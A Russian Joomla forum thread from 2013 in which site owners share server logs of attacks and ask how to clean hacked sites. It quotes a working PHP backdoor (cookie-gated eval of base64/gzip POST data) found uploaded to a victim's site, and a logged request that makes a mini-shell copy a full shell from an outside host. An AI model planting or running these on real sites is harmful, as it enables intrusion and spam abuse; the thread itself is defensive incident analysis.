Новости Joomla

Как тестировать Joomla PHP-разработчику? Компонент Patch tester.

👩‍💻 Как тестировать Joomla PHP-разработчику? Компонент Patch tester.Joomla - open source PHP-фреймворк с готовой админкой. Его основная разработка ведётся на GitHub. Для того, чтобы международному сообществу разработчиков было удобнее тестировать Pull Requests был создан компонент Patch Tester, который позволяет "накатить" на текущую установку Joomla именно те изменения, которые необходимо протестировать. На стороне инфраструктуры Joomla для каждого PR собираются готовые пакеты, в которых находится ядро + предложенные изменения. В каждом PR обычно находятся инструкции по тестированию: куда зайти, что нажать, ожидаемый результат. Тестировщики могут предположить дополнительные сценарии, исходя из своего опыта и найти баги, о которых сообщить разработчику. Или не найти, и тогда улучшение или исправление ошибки быстрее войдёт в ядро Joomla. Напомню, что для того, чтобы PR вошёл в ядро Joomla нужны минимум 2 положительных теста от 2 участников сообщества, кроме автора. Видео на YouTubeВидео на VK ВидеоВидео на RuTubeКомпонент на GitHub https://github.com/joomla-extensions/patchtester@joomlafeed#joomla #php #webdev #community

Вышел релиз Revo PageBuilder Toolkit for YOOtheme Pro 1.6

Вышел релиз Revo PageBuilder Toolkit for YOOtheme Pro 1.6.2PageBuilder Toolkit - это специализированный плагин для конструктора страниц Yootheme Pro, содержит набор различных утилит для ускорения процесса работы и отладки макета, множественные улучшения в интерфейсе, включая поддержку dark mode, подсказки, быстрая смена разрешения в окне просмотра и много чего еще.v.1.6.2 Что нового?- Индикатор статусов: теперь не просто показывает состояние запросов, но и делает автоматические попытки их отправки при кратковременных сбоях в сети, а если это не помогло, то переводит конструктор в ручной режим, что позволяет сохранит макет и настройки темы прежде чем вы потеряете все, что было сделано с момента последнего сохранения- Подсветка ошибок в макете: плагин анализирует код страницы и может автоматически подсвечивать data атрибуты с кучей мусора, которые попадают в код страницы при копипасте из Figma в TinyMCE (пригодится для старых макетов, в текущей работе плагин сам очищает код мусора). Также есть подсветка семантических ошибок сборки - дубли h1 тега на странице и вложенных друг в друга заголовков.- Улучшена поддержка будущего релиза Yootheme Pro 5 и редактора CodeMirror 6Плагин для русскоязычных пользователей доступен в каталоге расширений SovMart и распространяется за символическую плату (100р). Разработчики Joomla расширений и партнеры автора могут получить плагин бесплатно.Для работы плагина необходим конструктор страниц Yootheme Pro.Разработчик плагина - участник нашего сообщества Александр Судьбинов (@alexrevo), член официальной группы поддержки Yootheme Pro. Страница расширенияОписание на сайте автора@joomlafeed#joomla #yootheme

0 Пользователей и 1 Гость просматривают эту тему.
  • 678 Ответов
  • 268438 Просмотров
*

AlexJAM

  • Осваиваюсь на форуме
  • 10
  • 0 / 0
Свежий улов. Что-то новое.

Спойлер
[свернуть]

Как и в прошлый раз новых файлов по заданным адресам нет.
*

Morphina

  • Новичок
  • 4
  • 0 / 0
Свежие логи


Спойлер
[свернуть]

Спойлер
[свернуть]

Спойлер
[свернуть]
*

jerkyboy

  • Осваиваюсь на форуме
  • 10
  • 0 / 0
Доброго всем времени суток!
После того как поймал себе вирусов на несколько сайтов с CMS Joomla, поставил плагин jhackguard
Получил первый лог на одном из сайтов, подскажите что вот это означает:
Код
2013-01-28	18:32:10	-	178.137.95.78	-	Changed GET value from:  	(здесь путь к регистрации на моём сайте, он был зашифрован) Result: использованы данные x_fields.txt; использован никнейм "ovetle1984"; зарегистрировались; вошли; не нашлось формы для отправки; возможно, регистрация не удалась (выслан код активации / используется дополнительная защита / сбой в работе форума / ...); to: 	
2013-01-28 18:32:20 - 178.137.95.78 - Changed GET value from:  (здесь путь к регистрации на моём сайте, он был зашифрован) Result: использованы данные x_fields.txt; использован никнейм "ovetle1984"; зарегистрировались; вошли; не нашлось формы для отправки;
« Последнее редактирование: 30.01.2013, 03:30:51 от jerkyboy »
*

ihomyak

  • Осваиваюсь на форуме
  • 11
  • 0 / 0
ничего не понимаю. у меня видно что кто-то подбирает пароли к админке ежедневно, но ни jhackguard , ни Marco's SQL Injection никаких сообщений не выдает, хотя настройки такие же как на рисунках.
*

Lucentezza

  • Новичок
  • 7
  • 0 / 0
Доброго всем времени суток!
Знатоки, подскажите, пожалуйста, что это подбор пароля?

Многократный вызов подобных функций: сайт/public_html/
/function%20forEach()%20{%20[native%20code]%20}
/function(){return%20this[$random(0,this.length-1)]||null
/function(){var%20red=this[0],green=this[1],blue=this[2]
/function(array){if(this.length%3C3)return%20false
/function(array){if(this.length!=3)return%20false
/function(){return%20this[this.length-1]||null
/_vti_bin/owssvr.dll
/function(start,length){start=start||0
/function(array){for(var%20i=0,j=array.length
/function(array){for(var%20i=0,l=array.length
/function(keys){var%20obj={},length=Math.min(this.length,keys.length)
/function(item,from){return%20this.indexOf(item,from)!=-1
/function(item){var%20i=0
/function(item){if(!this.contains(item))this.push(item)

 Несколько часов уже отправляется на выполнение такой скрипт, в ответ File does not exist
Пока этот IP заблокировала, но в след. раз будет новый...
Чем это грозит и как с этим бороться?
*

AlexJAM

  • Осваиваюсь на форуме
  • 10
  • 0 / 0
Свежий улов

Спойлер
[свернуть]

Такого еще не было.
*

scomp

  • Новичок
  • 9
  • 2 / 0
Добрый день.

Ежедневно в логах масса интересных записей, но первый раз увидел такое:

Спойлер
[свернуть]

Что пытаются сделать с помошью компонента com_mailto?

Добавил позже:
Была похожая дырка с SQL-инъекцией: http://sebug.net/vuldb/ssvid-17893
Обсуждение похожей дыры: http://joomlaforum.ru/index.php/topic,131090.0.html

В данном случае выяснил, что идет просто перебор ссылок "отправить по e-mail" у каждого материала.
« Последнее редактирование: 06.02.2013, 17:04:08 от scomp »
*

KAVTechnar

  • Осваиваюсь на форуме
  • 17
  • 0 / 0
Здравствуйте, уважаемые Форумчане. У меня проблема следующая - хостинг сообщил, что с моего аккаунта осуществляется рассылка спама, закрыл доступ к отправке писем с сервера и предложил проанализировать логи. Честно признаюсь, что я анализирую логи впервые. Почитав различные форумы и посты на эту тему, пришёл к выводу, что нужно искать нечто необычное и в особенности логи, содержащие слово POST. Как я понимаю GET – означает, что пользователь просто просмотрел страницу сайта, а POST – как раз означает загрузку какого либо файла.
Мне показались подозрительными логи:
pgs-expert.ru 94.242.233.75 - - [04/Feb/2013:03:24:40 +0400] "POST /plugins/editors/jce/tiny_mce/plugins/print/2d6fc353.php HTTP/1.0" 200 224 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10"
pgs-expert.ru 94.242.233.75 - - [29/Jan/2013:16:00:31 +0400] "POST /images/stories/oobrmr.php HTTP/1.0" 200 44 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"

При этом загруженные файлы содержат одинаковый код:

<?php
if(!empty($_COOKIE['__utma']) and substr($_COOKIE['__utma'],0,16)=='3469825000034634'){
if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
  echo '<textarea id=areatext>';
  eval($msg);
  echo '</textarea>bg';
  exit;
}}
?>

Вопросы:
1.   Являются ли эти файлы вирусными, и могла ли с помощью них выполнятся рассылку спама? Могу ли я удалив данные файлы, сообщить хостингу, что проблема решена и чтобы он открыл доступ к отправке писем с сервера.
2.   Как выявить уязвимость, через которую были загружены файла 2d6fc353.php и oobrmr.php? Существует ли какой ни будь простой и надёжный способ защиты сайтов?
*

wishlight

  • Гуру
  • 5075
  • 319 / 1
  • От 300 руб быстрый хостинг. Сервера.
JCE стоит? в папке images по определению нет php файлов, это вредоносные скрипты.
*

KAVTechnar

  • Осваиваюсь на форуме
  • 17
  • 0 / 0
Спасибо.
Я так понимаю, JCE - редактор контента для Joomla!... Тогда JCE у меня не установлено, стандартный редактор
*

KAVTechnar

  • Осваиваюсь на форуме
  • 17
  • 0 / 0
wishlight, может быть Вы посмотрите мой сайт, устраните уязвимости через которые были загружены вредоносные файлы. Сколько такая услуга стоит? Могу выслать логи и другую необходимую информацию, скажите куда?
*

Hellbartonio

  • Новичок
  • 1
  • 0 / 0
на подбор пароля

можно поинтересоваться что за хост, просто есть мысль, и хочу утвердить её
Кстати, адрес 213.171.204.130 засветился и у меня в логах, уже неделю подряд каждый день что-то там пытается сделать.
*

assaru

  • Давно я тут
  • 763
  • 88 / 1
Кстати, адрес 213.171.204.130 засветился и у меня в логах, уже неделю подряд каждый день что-то там пытается сделать.
IP Ban никто не отменял...
Проблему можно решить и по скрину и по эмоциям, счет на оплату через ЛС (с) Nobody
*

wishlight

  • Гуру
  • 5075
  • 319 / 1
  • От 300 руб быстрый хостинг. Сервера.
*

RomanA

  • Захожу иногда
  • 111
  • 0 / 0
Цитировать
Мне показались подозрительными логи:
pgs-expert.ru 94.242.233.75 - - [04/Feb/2013:03:24:40 +0400] "POST /plugins/editors/jce/tiny_mce/plugins/print/2d6fc353.php HTTP/1.0" 200 224 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10"
pgs-expert.ru 94.242.233.75 - - [29/Jan/2013:16:00:31 +0400] "POST /images/stories/oobrmr.php HTTP/1.0" 200 44 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"

При этом загруженные файлы содержат одинаковый код:

<?php
if(!empty($_COOKIE['__utma']) and substr($_COOKIE['__utma'],0,16)=='3469825000034634'){
if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
  echo '<textarea id=areatext>';
  eval($msg);
  echo '</textarea>bg';
  exit;
}}
?>

Аналогичная фигня:
- В логах сервера появилась масса строк типа:
     217.112.35.87 сайт.ru - [25/Feb/2013:23:11:33 +0400] "GET /components/com_morfeoshow/tpl/resources/fancy/ea85dfa.php HTTP/1.1" 200 14 "-" "-"
     217.112.35.87 сайт.ru - [25/Feb/2013:23:11:33 +0400] "GET /plugins/content/sigplus/engines/slimbox2/deb2330.php HTTP/1.1" 200 14 "-" "-"
     217.112.35.87 сайт.ru - [25/Feb/2013:23:11:33 +0400] "GET /language/tr-TR/6717.php HTTP/1.1" 200 14 "-" "-"

- Перестали работать некоторые скрипты (JS были дополнены большим количеством ";;;;;;;;;;;;;" )
- В процессе загрузки страниц в статусе мелькали левые ссылки

Все левые файлы вычистил, меры безопасности из здесь обсуждавшихся предпринял. Сейчас сайт работает нормально, но Айболит ругается "Найдены сигнатуры шелл-скрипта. Подозрение на вредоносный скрипт":

/modules/mod_junewsultra/img/img.php
p_key = $_GET['src']; $srcurl = $_GET['src']; $imgurl = |base64_decode($_GET['src']); $imgurl = split("&", $imgurl); $imgloa

/libraries/tcpdf/tcpdf.php
bscissa of end point. * @param float $y3 Ordinate of end point. * @access pr|ivate * @since 2.1.000 (2008-01-08) */ function _outCurve($x1, $y1, $x2,

/plugins/system/legacy/functions.php
se 2: echo "<script>$action</script> \n"; break; case 1: default: |echo "<script>alert('$text'); $action</script> \n"; echo '<noscript>'; ec


Интересно: 1 - что это было? 2 - что делать с последними приведёнными кодами и их содержащими файлами?
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Аналогичная фигня:
- В логах сервера появилась масса строк типа:
     217.112.35.87 сайт.ru - [25/Feb/2013:23:11:33 +0400] "GET /components/com_morfeoshow/tpl/resources/fancy/ea85dfa.php HTTP/1.1" 200 14 "-" "-"
     217.112.35.87 сайт.ru - [25/Feb/2013:23:11:33 +0400] "GET /plugins/content/sigplus/engines/slimbox2/deb2330.php HTTP/1.1" 200 14 "-" "-"
     217.112.35.87 сайт.ru - [25/Feb/2013:23:11:33 +0400] "GET /language/tr-TR/6717.php HTTP/1.1" 200 14 "-" "-"

- Перестали работать некоторые скрипты (JS были дополнены большим количеством ";;;;;;;;;;;;;" )
- В процессе загрузки страниц в статусе мелькали левые ссылки

Все левые файлы вычистил, меры безопасности из здесь обсуждавшихся предпринял. Сейчас сайт работает нормально, но Айболит ругается "Найдены сигнатуры шелл-скрипта. Подозрение на вредоносный скрипт":

/modules/mod_junewsultra/img/img.php
p_key = $_GET['src']; $srcurl = $_GET['src']; $imgurl = |base64_decode($_GET['src']); $imgurl = split("&", $imgurl); $imgloa

/libraries/tcpdf/tcpdf.php
bscissa of end point. * @param float $y3 Ordinate of end point. * @access pr|ivate * @since 2.1.000 (2008-01-08) */ function _outCurve($x1, $y1, $x2,

/plugins/system/legacy/functions.php
se 2: echo "<script>$action</script> \n"; break; case 1: default: |echo "<script>alert('$text'); $action</script> \n"; echo '<noscript>'; ec


Интересно: 1 - что это было? 2 - что делать с последними приведёнными кодами и их содержащими файлами?
Полность можите выложить код приведенных файлов?
*

RomanA

  • Захожу иногда
  • 111
  • 0 / 0
Полность можите выложить код приведенных файлов?

Вот первый (/modules/mod_junewsultra/img/img.php), но, по-моему тут чисто:
Спойлер
[свернуть]

Второй - 230кб, большой, пока не буду класть, это, кажется, из файлов системы.
Третий, по-моему, ложное срабатывание.
*

RomanA

  • Захожу иногда
  • 111
  • 0 / 0
... И ещё, у меня касперский не даёт даже толком просмотреть эту страницу форума - кричит "троян!". Видимо, из-за приведённого в предыдущих постах кода :)
*

WebDisaster

  • Захожу иногда
  • 108
  • 12 / 0
Имеется свежий лог сканирования на не-Joomla уязвимости. Могу выложить, если кому интересно.
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Имеется свежий лог сканирования на не-Joomla уязвимости. Могу выложить, если кому интересно.
Выкладывай! мне интиресно!
*

WebDisaster

  • Захожу иногда
  • 108
  • 12 / 0
Лог сканирования на уязвимости (не_Joomla)

[вложение удалено Администратором]
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Лог сканирования на уязвимости (не_Joomla)
Это вас не на уязвимости сканировали, это на наличие каталогов вас сканировали, обычным сканером директорий!
*

WebDisaster

  • Захожу иногда
  • 108
  • 12 / 0
Ага, конечно. Это всё сплошь каталоги

Цитировать
/home/public_html/admincontrol.asp
/home/public_html/admincontrol.php
/home/public_html/adminka.php
/home/public_html/install_.php
/home/public_html/.htconfig
/home/public_html/about.php
/home/public_html/admin_.php
/home/public_html/.htaccess
/home/public_html/admins.php
/home/public_html/_update.php
/home/public_html/admincontrol.asp
/home/public_html/.htpasswd
/home/public_html/download.php
... и т.д.
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Ага, конечно. Это всё сплошь каталоги

ну если вам широкомоштабно разкрыть эту тему? то и файлы, в данном примере админские, сканируют обычно на такие вещи тогда, когда вытенули логин и пасс, переходят на следущий этап, поиска того куда можно их засунуть! для этого и используют сканер директорий в который также и входит списочик файлов (админские тоже!), который помогает оприделить структуру CMS или самописа, и облегчить себе поиски самой админки! но это не сканирование на уязвимости! я нормально ответил?!
*

WebDisaster

  • Захожу иногда
  • 108
  • 12 / 0
я нормально ответил?!
Нет. Но пережёвывать это дальше я не собираюсь.
*

lifter

  • Осваиваюсь на форуме
  • 39
  • 6 / 0
Ребята, помогите разобраться где дыра в сайтах. Второй раз заливают шеллы, в первый раз вроде все почистил, сегодня заметил опять левые PHP файлы. Снова почистил.
Анализирую логи сервера, все похоже началось с этого:

Цитировать
178.170.123.135 - - [15/Mar/2013:11:47:13 +0200] "GET /language/en-GB/en_GB.php?en=copy('http://www.astp.net/cache/test/cachea.txt','maimeta.php'); HTTP/1.0" 200 157 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.22 (KHTML, like Gecko) Chrome/25.0.1364.152 Safari/537.22" 

Обьясните что сие значит. Если нужно могу весь файл скинуть, может и раньше что то было.
С меня пиво)))
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Ребята, помогите разобраться где дыра в сайтах. Второй раз заливают шеллы, в первый раз вроде все почистил, сегодня заметил опять левые PHP файлы. Снова почистил.
Анализирую логи сервера, все похоже началось с этого:

Обьясните что сие значит. Если нужно могу весь файл скинуть, может и раньше что то было.
С меня пиво)))

Это выполнение PHP копирование через мини шелл, заливка полноценного шелла! тут ваш сайт надо анализировать на сторонние дыры!
*

WebDisaster

  • Захожу иногда
  • 108
  • 12 / 0
Ребята, помогите разобраться где дыра в сайтах.
Какая версия Joomla и что из расширений (плагины-модули-компоненты) установлено дополнительно?
В "чистой" Joomla 1.0.X, 1.5.x, 2.5.Х нет файла /language/en-GB/en_GB.php. Там явно "дырка".

Возможные варианты:
1. "дырку" эту сам себе установил с каким-то расширением (более вероятно) или даже с самой Joomla, если скачал её в сомнительном месте.
2. Это, всё-таки, было не "начало", и файл en_GB.php тебе залили раньше, хорошо замаскировав.
*

lifter

  • Осваиваюсь на форуме
  • 39
  • 6 / 0
Вот блин, действительно такого же файла там быть не должно...Спасибо за наводку.
Смотрю этот файл - содержание один-в-один с en-gb
XML и дата изменения сама поздняя из всех найденных мною файлов. Видимо его содержание потерли в конце работы...

По Joomla - стоит 1.5.21 и 1.5.26. Грешу на JCE который был установлен и не обновлен вовремя на одном из сайтов.

Видимо в первый раз не все зачистил, где то оставил шелл. Во второй раз по логам видно, что шли обращения и к старым потертым файлам.
Только не пойму почему во второй раз взломщик так мало сделал?))
Залил все пару файлов, и никакого постороннего кода в .js и php.?
Проверяет заметили ли админы?
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Вот блин, действительно такого же файла там быть не должно...Спасибо за наводку.
Смотрю этот файл - содержание один-в-один с en-gb
XML и дата изменения сама поздняя из всех найденных мною файлов. Видимо его содержание потерли в конце работы...
может просто доры залил? проверте... или какую нить биржу ссылок!
По Joomla - стоит 1.5.21 и 1.5.26. Грешу на JCE который был установлен и не обновлен вовремя на одном из сайтов.

Видимо в первый раз не все зачистил, где то оставил шелл. Во второй раз по логам видно, что шли обращения и к старым потертым файлам.
Только не пойму почему во второй раз взломщик так мало сделал?))
Залил все пару файлов, и никакого постороннего кода в .js и php.?
Проверяет заметили ли админы?
может просто доры залил? проверте... или какую нить биржу ссылок!
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

При открытии сайта с режима инкогнито перекидывает на вирусный сайт

Автор 62411

Ответов: 6
Просмотров: 3181
Последний ответ 31.03.2024, 16:14:32
от SeBun
Скрипты защиты Joomla 4

Автор mister_boy

Ответов: 6
Просмотров: 3470
Последний ответ 16.05.2023, 16:38:58
от mister_boy
Способы защиты сайта от DDoS атак?

Автор IgorMJ

Ответов: 7
Просмотров: 2767
Последний ответ 05.10.2021, 21:39:26
от ShopES
Тестирую сайты на уязвимости

Автор SalityGEN

Ответов: 0
Просмотров: 1047
Последний ответ 21.08.2021, 23:01:01
от SalityGEN
Новый набег ботов в регистрации сайта... Какой в этом смысл то?

Автор Cedars

Ответов: 11
Просмотров: 2433
Последний ответ 03.11.2020, 17:36:03
от Cedars